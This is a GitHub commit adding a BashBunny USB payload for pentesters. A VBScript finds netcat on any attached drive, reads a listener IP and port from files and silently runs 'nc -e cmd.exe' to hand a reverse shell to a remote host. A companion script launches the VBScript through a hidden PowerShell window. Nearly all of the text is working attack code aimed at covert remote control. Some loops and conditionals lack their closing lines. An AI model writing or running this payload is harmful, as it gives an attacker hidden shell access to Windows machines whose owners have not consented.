
This payload executes a VBScript as the payload.  The sample VBScript creates a netcat reverse shell, but any VBScript can be substituted.  netcat.exe must be sourced elsewhere.
ralphyz 2017-03-10 19:51:19 -05:00 committed by GitHub
parent 3bc10fa135
commit 938be26260
4 changed files with 199 additions and 0 deletions

View File

@ -0,0 +1,162 @@
Option Explicit
' Title: a.vbs
' Author: RalphyZ
' Version: 1.0
' Target: Windows 7+
' Description:
' This VBScript is used by a BashBunny payload to
' to create a netcat reverse shell. The netcat listener
' IP Address and Port are stored in separate files - so that
' Red Teams can quickly change information. The "IncrementPort"
' subroutine will increase the port number by 1 every time the
' script is called. This is so that you can start multiple
' listeners while doing a PenTest, and grab multiple reverse
' shells in one trip. Uncomment that if you want the auto-increment
' Note: You must put the netcat executable in the strReverseShellPath directory
' Declare Constants
Const ForReading = 1
Const ForWriting = 2
' Declare Global Variables
Dim strListenerPort, strNewListenerPort, strListenerIP
Dim objFSO, objFile, strCurrentDirectory
Dim strNetCatEXE, strReverseShellPath, strListnerPortFile, strListenerIPFile
' The netcat executable name
strNetCatEXE = "nc.exe"
' The folder location
strReverseShellPath = "\payloads\library\RAZ_ReverseShell\"
' The file containing the listener port
strListnerPortFile = "listener_port.txt"
' The file containing the listener ip address
strListenerIPFile = "listener_ip.txt"
' Create a File System Object
Set objFSO = CreateObject("Scripting.FileSystemObject")
strCurrentDirectory = FindCurrentDirectory()
' Read the Host IP Address (where the listener resides)
' Read the listener port
' Increment the listener port - for multiple shells
' Great for Red Teams
' Start NetCat Reverse Shell
' Name: FindCurrentDirectory
' Arguments: None
' Return Value: None
' Description: Find the netcat executable
Function FindCurrentDirectory
Dim objDrives, d
' Set default return value
FindCurrentDirectory = ""
' Search all drives for the netcat exe
Set objDrives = objFSO.Drives
For Each d in objDrives
If (objFSO.FileExists(d + strReverseShellPath + strNetCatEXE)) Then
FindCurrentDirectory = d + strReverseShellPath
End if
End Function
' Name: ReadHostIP
' Arguments: None
' Return Value: None
' Description: Read the listener IP
Sub ReadHostIP()
' Opens the file for reading
Set objFile = objFSO.OpenTextFile(strCurrentDirectory + strListenerIPFile , ForReading)
' Read the host IP
strListenerIP = objFile.ReadAll
' Close the file
End Sub
' Name: ReadPort
' Arguments: None
' Return Value: None
' Description: Read the listener port
Sub ReadPort()
' Opens the file for reading
Set objFile = objFSO.OpenTextFile(strCurrentDirectory + strListnerPortFile , ForReading)
' Read the listener port
strListenerPort = objFile.ReadAll
' Close the file
End Sub
' Name: IncrementPort
' Arguments: None
' Return Value: None
' Description: Read the listener port, increment the counter by 1, and write
' the new value
Sub IncrementPort()
' Increment the listener port
strNewListenerPort = strListenerPort + 1
' Open the file that contains the listener port for writing
Set objFile = objFSO.OpenTextFile(strCurrentDirectory + strListnerPortFile , ForWriting)
' Write the new (incremented) port
objFile.WriteLine strNewListenerPort
' Close the file
End Sub
' Name: StartNetCat
' Arguments: None
' Return Value: None
' Description: Start netcat on the appropriate port
Sub StartNetCat()
Dim strNetCat, strCommand, objShell
' Build the path to the netcat executable
strNetCat = objFSO.BuildPath(strCurrentDirectory, strNetCatEXE)
' Create the command string to run netcat on the correct ip and port,
' and serve cmd.exe to the listener
strCommand = strNetCat + " -nv " + strListenerIP + " " + strListenerPort + " -e cmd.exe"
' Create the WScript Shell object
Set objShell = WScript.CreateObject ("WScript.Shell")
' Run the command (' , 0'= hidden)
objShell.run strCommand, 0
' Free the object from memory
Set objShell = Nothing
End Sub

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@ -0,0 +1,35 @@
# Title: RAZ_VBScript
# Author: RalphyZ
# Version: 1.0
# Target: Windows 7+
# Dependencies: VBScript (a.vbs) in the switch folder with this file
# Description: Executes a VBScript, concealed in a hidden PowerShell window
# Colors:
# Green.....................Working
# White.....................Completed without error
# Light-Blue (blinking).....a.vbs was not found
# Get the switch position
source bunny_helpers.sh
# Check if a.vbs is present
if [ ! -f "/root/udisk/payloads/${SWITCH_POSITION}/a.vbs" ] ; then
LED B G 100
exit 1
# Run the VBScript
QUACK STRING powershell -WindowStyle Hidden ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\${SWITCH_POSITION}\\a.vbs')"
# Green LED for finished